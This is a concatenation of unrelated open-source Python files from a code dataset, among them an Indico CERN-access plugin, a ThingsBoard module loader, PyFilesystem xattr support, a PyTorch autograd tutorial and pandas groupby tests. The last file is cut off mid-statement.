def send_adams_post_request(event, registrations, update=False):
    """Send POST request to ADaMS API

    :param update: if True, send request updating already stored data
                   (existing reservation codes are reused instead of
                   generating new ones)
    :return: tuple ``(CERNAccessRequestState.active, data)`` where
             ``data`` maps registration ids to the payloads sent
    """
    data = {reg.id: build_access_request_data(reg, event, generate_code=(not update)) for reg in registrations}
    _send_adams_http_request('POST', data.values())
    return CERNAccessRequestState.active, data
def send_adams_delete_request(registrations):
    """Send DELETE request to ADaMS API."""
    payload = [generate_access_id(reg.id) for reg in registrations]
    _send_adams_http_request('DELETE', payload)
def generate_access_id(registration_id):
    """Generate an id in the format required by the ADaMS API."""
    # ADaMS ids are the registration id prefixed with 'in'.
    return 'in%s' % registration_id
def build_access_request_data(registration, event, generate_code):
    """Return a dictionary with data required by ADaMS API.

    :param generate_code: if True, a fresh reservation code is created;
                          otherwise the registration's stored code is reused
    """
    from indico_cern_access.plugin import CERNAccessPlugin
    start_dt, end_dt = get_access_dates(get_last_request(event))
    tz = timezone('Europe/Zurich')
    # ADaMS expects ASCII; the title is also capped at 100 characters.
    title = do_truncate(None, unicode_to_ascii(remove_accents(event.title)), 100, leeway=0)
    if generate_code:
        reservation_code = get_random_reservation_code()
    else:
        reservation_code = registration.cern_access_request.reservation_code
    data = {'$id': generate_access_id(registration.id),
            '$rc': reservation_code,
            '$gn': title,
            '$fn': unicode_to_ascii(remove_accents(registration.first_name)),
            '$ln': unicode_to_ascii(remove_accents(registration.last_name)),
            '$sd': start_dt.astimezone(tz).strftime('%Y-%m-%dT%H:%M'),
            '$ed': end_dt.astimezone(tz).strftime('%Y-%m-%dT%H:%M')}
    if registration.cern_access_request and registration.cern_access_request.license_plate:
        data['$lp'] = registration.cern_access_request.license_plate
    # HMAC-SHA256 signature over the sorted 'key:value' pairs lets ADaMS
    # verify the payload came from this plugin.
    checksum = ';;'.join('{}:{}'.format(key, value) for key, value in sorted(data.viewitems()))
    signature = hmac.new(str(CERNAccessPlugin.settings.get('secret_key')), checksum, hashlib.sha256)
    data['$si'] = signature.hexdigest()
    return data
def handle_event_time_update(event):
    """Update access requests after an event time change"""
    regs = get_requested_registrations(event=event, only_active=True)
    if not regs:
        return
    # Re-send the (updated) access dates to ADaMS for all active requests.
    state = send_adams_post_request(event, regs, update=True)[0]
    if state == CERNAccessRequestState.active:
        update_access_requests(regs, state)
def update_access_request(req):
    """Add, update and delete CERN access requests from registration forms.

    ``req.data['regforms']`` holds the ids of the forms that should have
    access requested; forms no longer listed are withdrawn (locally and
    in ADaMS).
    """
    event = req.event
    existing_forms = get_requested_forms(event)
    requested_forms = req.data['regforms']
    # Pull out ids of existing and requested forms to easily
    # check which ones should be added/deleted afterwards
    existing_forms_ids = {regform.id for regform in existing_forms}
    requested_forms_ids = {int(id) for id in requested_forms}
    event_regforms = {regform.id: regform for regform in event.registration_forms}
    # add requests
    for regform_id in requested_forms_ids - existing_forms_ids:
        regform = event_regforms[regform_id]
        create_access_request_regform(regform, state=CERNAccessRequestState.active)
        enable_ticketing(regform)
    # delete requests
    for regform_id in existing_forms_ids - requested_forms_ids:
        regform = event_regforms[regform_id]
        registrations = get_requested_registrations(event, regform=regform)
        if registrations:
            send_adams_delete_request(registrations)
        regform.cern_access_request.request_state = CERNAccessRequestState.withdrawn
        remove_access_template(regform)
        withdraw_access_requests(registrations)
        notify_access_withdrawn(registrations)
def remove_access_template(regform):
    """Detach the CERN access ticket template from *regform*.

    Only clears the template when it is the one configured for CERN
    access, so a custom template chosen by organizers is left alone.
    """
    from indico_cern_access.plugin import CERNAccessPlugin
    access_tpl = CERNAccessPlugin.settings.get('access_ticket_template')
    if regform.ticket_template == access_tpl:
        regform.ticket_template = None
def add_access_requests(registrations, data, state):
    """Add CERN access requests for registrations.

    ``data`` maps registration ids to ADaMS payloads; the '$rc' field
    carries the reservation code to store.
    """
    for reg in registrations:
        create_access_request(reg, state, data[reg.id]['$rc'])
def update_access_requests(registrations, state):
    """Set the request state on every registration's access request."""
    for reg in registrations:
        reg.cern_access_request.request_state = state
def withdraw_access_requests(registrations):
    """Withdraw CERN access requests and purge their identity data."""
    withdrawn = CERNAccessRequestState.withdrawn
    for reg in registrations:
        request = reg.cern_access_request
        request.request_state = withdrawn
        request.clear_identity_data()
def withdraw_event_access_request(req):
    """Withdraw all CERN access requests of an event."""
    requested_forms = get_requested_forms(req.event)
    requested_registrations = get_requested_registrations(req.event)
    # Remove the registrations from ADaMS first, then update local state.
    if requested_registrations:
        send_adams_delete_request(requested_registrations)
    for regform in requested_forms:
        regform.cern_access_request.request_state = CERNAccessRequestState.withdrawn
        remove_access_template(regform)
    withdraw_access_requests(requested_registrations)
    notify_access_withdrawn(requested_registrations)
def get_random_reservation_code():
    """Generate random reservation code for data required by ADaMS API.

    Format: 'I' followed by six distinct characters from an alphabet
    that omits the ambiguous O and 0.
    """
    alphabet = 'ABCDEFGHIJKLMNPQRSTUVWXYZ123456789'
    return 'I' + ''.join(random.sample(alphabet, 6))
def create_access_request(registration, state, reservation_code):
    """Create CERN access request object for registration.

    Reuses (and updates) an existing request object when present.
    """
    existing = registration.cern_access_request
    if existing:
        existing.request_state = state
        existing.reservation_code = reservation_code
    else:
        registration.cern_access_request = CERNAccessRequest(
            request_state=state, reservation_code=reservation_code)
def create_access_request_regform(regform, state):
    """Create CERN access request object for registration form."""
    from indico_cern_access.plugin import CERNAccessPlugin
    access_tpl = CERNAccessPlugin.settings.get('access_ticket_template')
    # Activating a request also switches the form to the CERN ticket
    # template (when one is configured).
    if state == CERNAccessRequestState.active and access_tpl:
        regform.ticket_template = access_tpl
    if regform.cern_access_request:
        regform.cern_access_request.request_state = state
    else:
        regform.cern_access_request = CERNAccessRequestRegForm(request_state=state)
def is_authorized_user(user):
    """Check if user is authorized to request access to CERN.

    Admins are always authorized; everyone else must be in the
    'authorized_users' ACL of the plugin settings.
    """
    from indico_cern_access.plugin import CERNAccessPlugin
    return bool(user.is_admin) or \
        CERNAccessPlugin.settings.acls.contains_user('authorized_users', user)
def notify_access_withdrawn(registrations):
    """Notify participants when access to CERN has been withdrawn."""
    for registration in registrations:
        template = get_template_module('cern_access:emails/request_withdrawn_email.html', registration=registration)
        email = make_email(to_list=registration.email, template=template, html=True)
        # `session` may be unavailable outside a request context, hence
        # the guard when attributing the notification to a user.
        send_email(email, event=registration.registration_form.event, module='Registration',
                   user=(session.user if session else None))
def send_ticket(registration):
    """Send the ticket to access the CERN site by email."""
    # The email body shows the access validity window of the latest request.
    start_dt, end_dt = get_access_dates(get_last_request(registration.event))
    template = get_template_module('cern_access:emails/ticket_email.html', registration=registration,
                                   start_dt=start_dt, end_dt=end_dt)
    # Attach the rendered ticket file(s) for this registration.
    attachments = get_ticket_attachments(registration)
    email = make_email(to_list=registration.email, template=template, html=True, attachments=attachments)
    send_email(email, event=registration.registration_form.event, module='Registration', user=session.user)
def enable_ticketing(regform):
    """Enable ticketing module automatically.

    No-op when ticketing is already enabled, so manually-tuned ticket
    settings are not overwritten.
    """
    if regform.tickets_enabled:
        return
    regform.tickets_enabled = True
    regform.ticket_on_email = True
    regform.ticket_on_event_page = True
    regform.ticket_on_summary_page = True
def is_category_blacklisted(category):
    """Return True if *category* is in the configured exclusion list."""
    # Excluded categories are configured as a list of {'id': ...} mappings.
    from indico_cern_access.plugin import CERNAccessPlugin
    return any(category.id == int(cat['id']) for cat in CERNAccessPlugin.settings.get('excluded_categories'))
def is_event_too_early(event):
    """Return True if the event starts before the configured earliest date."""
    from indico_cern_access.plugin import CERNAccessPlugin
    earliest_start_dt = CERNAccessPlugin.settings.get('earliest_start_dt')
    return earliest_start_dt is not None and event.start_dt < earliest_start_dt
def grant_access(registrations, regform, email_subject=None, email_body=None, email_sender=None):
    """Request CERN site access for *registrations* via ADaMS.

    Registrations that already have an active request are skipped.
    Tickets are emailed right away when identity data is complete;
    otherwise the registrant is emailed a link to the identity form.
    """
    event = regform.event
    # Only push registrations that don't already have an active request.
    new_registrations = [reg for reg in registrations
                         if not (reg.cern_access_request and
                                 not reg.cern_access_request.is_withdrawn and
                                 reg.cern_access_request.request_state == CERNAccessRequestState.active)]
    state, data = send_adams_post_request(event, new_registrations)
    add_access_requests(new_registrations, data, state)
    registrations_without_data = []
    for registration in new_registrations:
        if not registration.cern_access_request.has_identity_info:
            registrations_without_data.append(registration)
        elif regform.ticket_on_email:
            send_ticket(registration)
    if registrations_without_data:
        send_form_link(registrations_without_data, email_subject, email_body, email_sender)
def send_form_link(registrations, email_subject_tpl, email_body_tpl, email_sender):
    """Send a mail asking for personal information to be filled in using a web form."""
    for registration in registrations:
        # Subject/body are templates whose cern-access placeholders are
        # expanded per registration.
        email_body = replace_placeholders('cern-access-email', email_body_tpl,
                                          regform=registration.registration_form, registration=registration)
        email_subject = replace_placeholders('cern-access-email', email_subject_tpl,
                                             regform=registration.registration_form, registration=registration)
        template = get_template_module('cern_access:emails/identity_data_form_email.html', registration=registration,
                                       email_subject=email_subject, email_body=email_body)
        email = make_email(to_list=registration.email, from_address=email_sender, template=template, html=True)
        send_email(email, event=registration.registration_form.event, module='Registration', user=session.user)
def revoke_access(registrations):
    """Delete the registrations' ADaMS requests and withdraw them locally.

    NOTE(review): the DELETE is sent for *all* given registrations, but
    only the currently-active ones are withdrawn/notified locally —
    confirm this asymmetry is intended.
    """
    if not registrations:
        return
    send_adams_delete_request(registrations)
    requested_registrations = [reg for reg in registrations if
                               reg.cern_access_request and not
                               reg.cern_access_request.is_withdrawn and
                               reg.cern_access_request.request_state == CERNAccessRequestState.active]
    withdraw_access_requests(requested_registrations)
    notify_access_withdrawn(requested_registrations)
def check_access(req):
    """Raise Forbidden unless the requesting user may ask for CERN access.

    Requires an authorized user, a non-blacklisted category, and an
    event that does not start before the configured earliest date.
    """
    if not is_authorized_user(session.user):
        raise Forbidden()
    if is_category_blacklisted(req.event.category):
        raise Forbidden()
    if is_event_too_early(req.event):
        raise Forbidden()
def get_access_dates(req):
    """Return the (start, end) access window for *req*.

    Per-request overrides are used when both are set; otherwise the
    event's own start/end datetimes are returned.
    """
    start = req.data['start_dt_override']
    end = req.data['end_dt_override']
    if not (start and end):
        return req.event.start_dt, req.event.end_dt
    return dateutil.parser.parse(start), dateutil.parser.parse(end)
def sanitize_personal_data():
    """Clear stored identity data for events past the retention window."""
    from indico_cern_access.plugin import CERNAccessPlugin
    # Requests with identity data whose event ended before
    # now - delete_personal_data_after.
    query = (CERNAccessRequest.query
             .join(CERNAccessRequest.registration)
             .join(Registration.event)
             .filter(CERNAccessRequest.has_identity_info,
                     Event.end_dt < now_utc() - CERNAccessPlugin.settings.get('delete_personal_data_after')))
    for req in query:
        req.clear_identity_data()
        CERNAccessPlugin.logger.info('Removing personal data for registrant %d', req.registration_id)
    db.session.flush()
def sanitize_license_plate(number):
    """Sanitize a license plate number to [A-Z0-9]+, no dashes/spaces.

    Returns None when anything other than A-Z/0-9 remains after
    cleaning.
    """
    cleaned = re.sub(r'[ -]', '', number.strip().upper())
    if re.match(r'^[A-Z0-9]+$', cleaned):
        return cleaned
    return None
class AdamsError(Exception):
pass
| 43.136364
| 117
| 0.743197
|
4a0ea372492266f6577b137f695ba49099186bd7
| 30
|
py
|
Python
|
app/utils/exceptions/__init__.py
|
InNickF/django-template
|
a8a9e1e5cd8cf63543cc78ef4fbd6bce060a448b
|
[
"MIT"
] | 3
|
2020-09-20T11:21:01.000Z
|
2021-01-31T18:55:54.000Z
|
app/utils/exceptions/__init__.py
|
InNickF/django-template
|
a8a9e1e5cd8cf63543cc78ef4fbd6bce060a448b
|
[
"MIT"
] | 2
|
2020-09-21T09:53:32.000Z
|
2021-06-10T19:40:41.000Z
|
app/utils/exceptions/__init__.py
|
InNickF/django-template
|
a8a9e1e5cd8cf63543cc78ef4fbd6bce060a448b
|
[
"MIT"
] | 2
|
2021-01-17T20:59:23.000Z
|
2021-01-31T18:55:58.000Z
|
"""Custom app's exceptions"""
| 15
| 29
| 0.666667
|
4a0ea3bec05e713f8fd78035f6abd451d2e35a8f
| 3,501
|
py
|
Python
|
thingsboard-gateway/thingsboard_gateway/tb_utility/tb_loader.py
|
drexelwireless/thingsboard-gateway
|
c4af30c3874c4e507c14566e332d2b4628e506e8
|
[
"Apache-2.0"
] | 1
|
2022-02-10T10:03:43.000Z
|
2022-02-10T10:03:43.000Z
|
thingsboard-gateway/thingsboard_gateway/tb_utility/tb_loader.py
|
drexelwireless/thingsboard-gateway
|
c4af30c3874c4e507c14566e332d2b4628e506e8
|
[
"Apache-2.0"
] | null | null | null |
thingsboard-gateway/thingsboard_gateway/tb_utility/tb_loader.py
|
drexelwireless/thingsboard-gateway
|
c4af30c3874c4e507c14566e332d2b4628e506e8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from importlib.util import module_from_spec, spec_from_file_location
from inspect import getmembers, isclass
from logging import getLogger
from os import listdir, path
log = getLogger("service")
EXTENSIONS_FOLDER = '/extensions'.replace('/', path.sep)
CONNECTORS_FOLDER = '/connectors'.replace('/', path.sep)
GRPC_CONNECTORS_FOLDER = '/grpc_connectors'.replace('/', path.sep)
DEB_INSTALLATION_EXTENSION_PATH = '/var/lib/thingsboard_gateway/extensions'.replace('/', path.sep)
class TBModuleLoader:
PATHS = []
LOADED_CONNECTORS = {}
@staticmethod
def find_paths():
root_path = path.abspath(path.dirname(path.dirname(__file__)))
log.debug("Root path is: " + root_path)
if path.exists(DEB_INSTALLATION_EXTENSION_PATH):
log.debug("Debian installation extensions folder exists.")
TBModuleLoader.PATHS.append(DEB_INSTALLATION_EXTENSION_PATH)
TBModuleLoader.PATHS.append(root_path + EXTENSIONS_FOLDER)
TBModuleLoader.PATHS.append(root_path + CONNECTORS_FOLDER)
TBModuleLoader.PATHS.append(root_path + GRPC_CONNECTORS_FOLDER)
@staticmethod
def import_module(extension_type, module_name):
if len(TBModuleLoader.PATHS) == 0:
TBModuleLoader.find_paths()
buffered_module_name = extension_type + module_name
if TBModuleLoader.LOADED_CONNECTORS.get(buffered_module_name) is not None:
return TBModuleLoader.LOADED_CONNECTORS[buffered_module_name]
try:
for current_path in TBModuleLoader.PATHS:
current_extension_path = current_path + path.sep + extension_type
if path.exists(current_extension_path):
for file in listdir(current_extension_path):
if not file.startswith('__') and file.endswith('.py'):
try:
module_spec = spec_from_file_location(module_name, current_extension_path + path.sep + file)
log.debug(module_spec)
if module_spec is None:
continue
module = module_from_spec(module_spec)
module_spec.loader.exec_module(module)
for extension_class in getmembers(module, isclass):
if module_name in extension_class:
log.info("Import %s from %s.", module_name, current_extension_path)
TBModuleLoader.LOADED_CONNECTORS[buffered_module_name] = extension_class[1]
return extension_class[1]
except ImportError:
continue
except Exception as e:
log.exception(e)
| 46.68
| 124
| 0.628963
|
4a0ea4076d5fd65f186079405d2073af10e69a68
| 339
|
py
|
Python
|
cart/migrations/0020_remove_comment_status.py
|
Mambodiev/ecom_website
|
ced03d61a99a7d657f7cb0106dbb9cf1ab15e367
|
[
"MIT"
] | null | null | null |
cart/migrations/0020_remove_comment_status.py
|
Mambodiev/ecom_website
|
ced03d61a99a7d657f7cb0106dbb9cf1ab15e367
|
[
"MIT"
] | 1
|
2022-03-30T21:19:09.000Z
|
2022-03-30T21:19:09.000Z
|
cart/migrations/0020_remove_comment_status.py
|
Mambodiev/ecom_website
|
ced03d61a99a7d657f7cb0106dbb9cf1ab15e367
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2 on 2021-07-26 07:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cart', '0019_rename_approuved_comment_approved'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='status',
),
]
| 18.833333
| 59
| 0.60767
|
4a0ea4196a23089abb2fab789f31cdc11d2a8325
| 82
|
py
|
Python
|
Modules/triangle_03/03_triangle.py
|
MihailMarkovski/Python-Advanced-2020
|
8edea78cbe5588a409ba9bc3767861250f58c1a6
|
[
"MIT"
] | 4
|
2020-09-19T13:53:19.000Z
|
2020-11-01T18:34:53.000Z
|
Modules/triangle_03/03_triangle.py
|
MNikov/Python-Advanced-September-2020
|
1d65039de7f094d908411afffa8aee9689ab4220
|
[
"MIT"
] | null | null | null |
Modules/triangle_03/03_triangle.py
|
MNikov/Python-Advanced-September-2020
|
1d65039de7f094d908411afffa8aee9689ab4220
|
[
"MIT"
] | null | null | null |
from Modules.triangle_03 import triangle_fn as tf
tf.draw_triangle(int(input()))
| 20.5
| 49
| 0.804878
|
4a0ea43038bad194749cdbbc66cf37f6f351c475
| 1,695
|
py
|
Python
|
fs/osfs/xattrs.py
|
rimrim/pyfs
|
ce9f3c76468a0779a0517ea7d7c191caf1bffd25
|
[
"BSD-3-Clause"
] | 1
|
2021-07-15T22:45:17.000Z
|
2021-07-15T22:45:17.000Z
|
fs/osfs/xattrs.py
|
rimrim/pyfs
|
ce9f3c76468a0779a0517ea7d7c191caf1bffd25
|
[
"BSD-3-Clause"
] | null | null | null |
fs/osfs/xattrs.py
|
rimrim/pyfs
|
ce9f3c76468a0779a0517ea7d7c191caf1bffd25
|
[
"BSD-3-Clause"
] | null | null | null |
"""
fs.osfs.xattrs
==============
Extended-attribute support for OSFS
"""
import os
import sys
import errno
from fs.errors import *
from fs.path import *
from fs.base import FS
try:
import xattr
except ImportError:
xattr = None
if xattr is not None:
class OSFSXAttrMixin(object):
"""Mixin providing extended-attribute support via the 'xattr' module"""
def __init__(self, *args, **kwargs):
super(OSFSXAttrMixin, self).__init__(*args, **kwargs)
@convert_os_errors
def setxattr(self, path, key, value):
xattr.xattr(self.getsyspath(path))[key]=value
@convert_os_errors
def getxattr(self, path, key, default=None):
try:
return xattr.xattr(self.getsyspath(path)).get(key)
except KeyError:
return default
@convert_os_errors
def delxattr(self, path, key):
try:
del xattr.xattr(self.getsyspath(path))[key]
except KeyError:
pass
@convert_os_errors
def listxattrs(self, path):
return list(xattr.xattr(self.getsyspath(path)).keys())
else:
class OSFSXAttrMixin(object):
"""Mixin disable extended-attribute support."""
def __init__(self, *args, **kwargs):
super(OSFSXAttrMixin, self).__init__(*args, **kwargs)
def getxattr(self,path,key,default=None):
raise UnsupportedError
def setxattr(self,path,key,value):
raise UnsupportedError
def delxattr(self,path,key):
raise UnsupportedError
def listxattrs(self,path):
raise UnsupportedError
| 22.905405
| 79
| 0.6
|
4a0ea4fc9d827e023dbbddfe368ba8c39c22351d
| 3,940
|
py
|
Python
|
beginner_source/examples_autograd/polynomial_custom_function.py
|
d2weber/tutorials
|
c08519b873566369d19a616c491ce2a9d4d5dde1
|
[
"BSD-3-Clause"
] | null | null | null |
beginner_source/examples_autograd/polynomial_custom_function.py
|
d2weber/tutorials
|
c08519b873566369d19a616c491ce2a9d4d5dde1
|
[
"BSD-3-Clause"
] | null | null | null |
beginner_source/examples_autograd/polynomial_custom_function.py
|
d2weber/tutorials
|
c08519b873566369d19a616c491ce2a9d4d5dde1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
r"""
PyTorch: Defining New autograd Functions
----------------------------------------
A third order polynomial, trained to predict :math:`y=\sin(x)` from :math:`-\pi`
to :math:`\pi` by minimizing squared Euclidean distance. Instead of writing the
polynomial as :math:`y=a+bx+cx^2+dx^3`, we write the polynomial as
:math:`y=a+b P_3(c+dx)` where :math:`P_3(x)=\frac{1}{2}\left(5x^3-3x\right)` is
the `Legendre polynomial`_ of degree three.
.. _Legendre polynomial:
https://en.wikipedia.org/wiki/Legendre_polynomials
This implementation computes the forward pass using operations on PyTorch
Tensors, and uses PyTorch autograd to compute gradients.
In this implementation we implement our own custom autograd function to perform
:math:`P_3'(x)`. By mathematics, :math:`P_3'(x)=\frac{3}{2}\left(5x^2-1\right)`
"""
import torch
import math
class LegendrePolynomial3(torch.autograd.Function):
"""
We can implement our own custom autograd Functions by subclassing
torch.autograd.Function and implementing the forward and backward passes
which operate on Tensors.
"""
@staticmethod
def forward(ctx, input):
"""
In the forward pass we receive a Tensor containing the input and return
a Tensor containing the output. ctx is a context object that can be used
to stash information for backward computation. You can cache arbitrary
objects for use in the backward pass using the ctx.save_for_backward method.
"""
ctx.save_for_backward(input)
return 0.5 * (5 * input ** 3 - 3 * input)
@staticmethod
def backward(ctx, grad_output):
"""
In the backward pass we receive a Tensor containing the gradient of the loss
with respect to the output, and we need to compute the gradient of the loss
with respect to the input.
"""
input, = ctx.saved_tensors
return grad_output * 1.5 * (5 * input ** 2 - 1)
dtype = torch.float
device = torch.device("cpu")
# device = torch.device("cuda:0") # Uncomment this to run on GPU
# Create Tensors to hold input and outputs.
# By default, requires_grad=False, which indicates that we do not need to
# compute gradients with respect to these Tensors during the backward pass.
x = torch.linspace(-math.pi, math.pi, 2000, device=device, dtype=dtype)
y = torch.sin(x)
# Create random Tensors for weights. For this example, we need
# 4 weights: y = a + b * P3(c + d * x), these weights need to be initialized
# not too far from the correct result to ensure convergence.
# Setting requires_grad=True indicates that we want to compute gradients with
# respect to these Tensors during the backward pass.
a = torch.full((), 0.0, device=device, dtype=dtype, requires_grad=True)
b = torch.full((), -1.0, device=device, dtype=dtype, requires_grad=True)
c = torch.full((), 0.0, device=device, dtype=dtype, requires_grad=True)
d = torch.full((), 0.3, device=device, dtype=dtype, requires_grad=True)
learning_rate = 5e-6
for t in range(2000):
# To apply our Function, we use Function.apply method. We alias this as 'P3'.
P3 = LegendrePolynomial3.apply
# Forward pass: compute predicted y using operations; we compute
# P3 using our custom autograd operation.
y_pred = a + b * P3(c + d * x)
# Compute and print loss
loss = (y_pred - y).pow(2).sum()
if t % 100 == 99:
print(t, loss.item())
# Use autograd to compute the backward pass.
loss.backward()
# Update weights using gradient descent
with torch.no_grad():
a -= learning_rate * a.grad
b -= learning_rate * b.grad
c -= learning_rate * c.grad
d -= learning_rate * d.grad
# Manually zero the gradients after updating weights
a.grad = None
b.grad = None
c.grad = None
d.grad = None
print(f'Result: y = {a.item()} + {b.item()} * P3({c.item()} + {d.item()} x)')
| 37.52381
| 84
| 0.671827
|
4a0ea5f5208730e0111b51f6d86f5056cfa0f96e
| 38,787
|
py
|
Python
|
pandas/tests/groupby/aggregate/test_aggregate.py
|
gabriellm1/pandas
|
020040b3b92516b445ddd8daba3b9818340e82d4
|
[
"BSD-3-Clause"
] | 1
|
2020-08-18T16:49:16.000Z
|
2020-08-18T16:49:16.000Z
|
pandas/tests/groupby/aggregate/test_aggregate.py
|
gabriellm1/pandas
|
020040b3b92516b445ddd8daba3b9818340e82d4
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/tests/groupby/aggregate/test_aggregate.py
|
gabriellm1/pandas
|
020040b3b92516b445ddd8daba3b9818340e82d4
|
[
"BSD-3-Clause"
] | 2
|
2021-07-17T19:28:31.000Z
|
2021-11-28T17:14:58.000Z
|
"""
test .agg behavior / note that .apply is tested generally in test_groupby.py
"""
import functools
from functools import partial
import numpy as np
import pytest
from pandas.errors import PerformanceWarning
from pandas.core.dtypes.common import is_integer_dtype
import pandas as pd
from pandas import DataFrame, Index, MultiIndex, Series, concat
import pandas._testing as tm
from pandas.core.base import SpecificationError
from pandas.core.groupby.grouper import Grouping
def test_groupby_agg_no_extra_calls():
# GH#31760
df = pd.DataFrame({"key": ["a", "b", "c", "c"], "value": [1, 2, 3, 4]})
gb = df.groupby("key")["value"]
def dummy_func(x):
assert len(x) != 0
return x.sum()
gb.agg(dummy_func)
def test_agg_regression1(tsframe):
grouped = tsframe.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.agg(np.mean)
expected = grouped.mean()
tm.assert_frame_equal(result, expected)
def test_agg_must_agg(df):
grouped = df.groupby("A")["C"]
msg = "Must produce aggregated value"
with pytest.raises(Exception, match=msg):
grouped.agg(lambda x: x.describe())
with pytest.raises(Exception, match=msg):
grouped.agg(lambda x: x.index[:2])
def test_agg_ser_multi_key(df):
# TODO(wesm): unused
ser = df.C # noqa
f = lambda x: x.sum()
results = df.C.groupby([df.A, df.B]).aggregate(f)
expected = df.groupby(["A", "B"]).sum()["C"]
tm.assert_series_equal(results, expected)
def test_groupby_aggregation_mixed_dtype():
# GH 6212
expected = DataFrame(
{
"v1": [5, 5, 7, np.nan, 3, 3, 4, 1],
"v2": [55, 55, 77, np.nan, 33, 33, 44, 11],
},
index=MultiIndex.from_tuples(
[
(1, 95),
(1, 99),
(2, 95),
(2, 99),
("big", "damp"),
("blue", "dry"),
("red", "red"),
("red", "wet"),
],
names=["by1", "by2"],
),
)
df = DataFrame(
{
"v1": [1, 3, 5, 7, 8, 3, 5, np.nan, 4, 5, 7, 9],
"v2": [11, 33, 55, 77, 88, 33, 55, np.nan, 44, 55, 77, 99],
"by1": ["red", "blue", 1, 2, np.nan, "big", 1, 2, "red", 1, np.nan, 12],
"by2": [
"wet",
"dry",
99,
95,
np.nan,
"damp",
95,
99,
"red",
99,
np.nan,
np.nan,
],
}
)
g = df.groupby(["by1", "by2"])
result = g[["v1", "v2"]].mean()
tm.assert_frame_equal(result, expected)
def test_groupby_aggregation_multi_level_column():
# GH 29772
lst = [
[True, True, True, False],
[True, False, np.nan, False],
[True, True, np.nan, False],
[True, True, np.nan, False],
]
df = pd.DataFrame(
data=lst,
columns=pd.MultiIndex.from_tuples([("A", 0), ("A", 1), ("B", 0), ("B", 1)]),
)
result = df.groupby(level=1, axis=1).sum()
expected = pd.DataFrame({0: [2.0, 1, 1, 1], 1: [1, 0, 1, 1]})
tm.assert_frame_equal(result, expected)
def test_agg_apply_corner(ts, tsframe):
# nothing to group, all NA
grouped = ts.groupby(ts * np.nan)
assert ts.dtype == np.float64
# groupby float64 values results in Float64Index
exp = Series([], dtype=np.float64, index=pd.Index([], dtype=np.float64))
tm.assert_series_equal(grouped.sum(), exp)
tm.assert_series_equal(grouped.agg(np.sum), exp)
tm.assert_series_equal(grouped.apply(np.sum), exp, check_index_type=False)
# DataFrame
grouped = tsframe.groupby(tsframe["A"] * np.nan)
exp_df = DataFrame(
columns=tsframe.columns, dtype=float, index=pd.Index([], dtype=np.float64)
)
tm.assert_frame_equal(grouped.sum(), exp_df, check_names=False)
tm.assert_frame_equal(grouped.agg(np.sum), exp_df, check_names=False)
tm.assert_frame_equal(grouped.apply(np.sum), exp_df.iloc[:, :0], check_names=False)
def test_agg_grouping_is_list_tuple(ts):
df = tm.makeTimeDataFrame()
grouped = df.groupby(lambda x: x.year)
grouper = grouped.grouper.groupings[0].grouper
grouped.grouper.groupings[0] = Grouping(ts.index, list(grouper))
result = grouped.agg(np.mean)
expected = grouped.mean()
tm.assert_frame_equal(result, expected)
grouped.grouper.groupings[0] = Grouping(ts.index, tuple(grouper))
result = grouped.agg(np.mean)
expected = grouped.mean()
tm.assert_frame_equal(result, expected)
def test_agg_python_multiindex(mframe):
grouped = mframe.groupby(["A", "B"])
result = grouped.agg(np.mean)
expected = grouped.mean()
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"groupbyfunc", [lambda x: x.weekday(), [lambda x: x.month, lambda x: x.weekday()]]
)
def test_aggregate_str_func(tsframe, groupbyfunc):
grouped = tsframe.groupby(groupbyfunc)
# single series
result = grouped["A"].agg("std")
expected = grouped["A"].std()
tm.assert_series_equal(result, expected)
# group frame by function name
result = grouped.aggregate("var")
expected = grouped.var()
tm.assert_frame_equal(result, expected)
# group frame by function dict
result = grouped.agg({"A": "var", "B": "std", "C": "mean", "D": "sem"})
expected = DataFrame(
{
"A": grouped["A"].var(),
"B": grouped["B"].std(),
"C": grouped["C"].mean(),
"D": grouped["D"].sem(),
}
)
tm.assert_frame_equal(result, expected)
def test_aggregate_item_by_item(df):
grouped = df.groupby("A")
aggfun = lambda ser: ser.size
result = grouped.agg(aggfun)
foo = (df.A == "foo").sum()
bar = (df.A == "bar").sum()
K = len(result.columns)
# GH5782
# odd comparisons can result here, so cast to make easy
exp = pd.Series(
np.array([foo] * K), index=list("BCD"), dtype=np.float64, name="foo"
)
tm.assert_series_equal(result.xs("foo"), exp)
exp = pd.Series(
np.array([bar] * K), index=list("BCD"), dtype=np.float64, name="bar"
)
tm.assert_almost_equal(result.xs("bar"), exp)
def aggfun(ser):
return ser.size
result = DataFrame().groupby(df.A).agg(aggfun)
assert isinstance(result, DataFrame)
assert len(result) == 0
def test_wrap_agg_out(three_group):
grouped = three_group.groupby(["A", "B"])
def func(ser):
if ser.dtype == object:
raise TypeError
else:
return ser.sum()
result = grouped.aggregate(func)
exp_grouped = three_group.loc[:, three_group.columns != "C"]
expected = exp_grouped.groupby(["A", "B"]).aggregate(func)
tm.assert_frame_equal(result, expected)
def test_agg_multiple_functions_maintain_order(df):
# GH #610
funcs = [("mean", np.mean), ("max", np.max), ("min", np.min)]
result = df.groupby("A")["C"].agg(funcs)
exp_cols = Index(["mean", "max", "min"])
tm.assert_index_equal(result.columns, exp_cols)
def test_agg_multiple_functions_same_name():
# GH 30880
df = pd.DataFrame(
np.random.randn(1000, 3),
index=pd.date_range("1/1/2012", freq="S", periods=1000),
columns=["A", "B", "C"],
)
result = df.resample("3T").agg(
{"A": [partial(np.quantile, q=0.9999), partial(np.quantile, q=0.1111)]}
)
expected_index = pd.date_range("1/1/2012", freq="3T", periods=6)
expected_columns = MultiIndex.from_tuples([("A", "quantile"), ("A", "quantile")])
expected_values = np.array(
[df.resample("3T").A.quantile(q=q).values for q in [0.9999, 0.1111]]
).T
expected = pd.DataFrame(
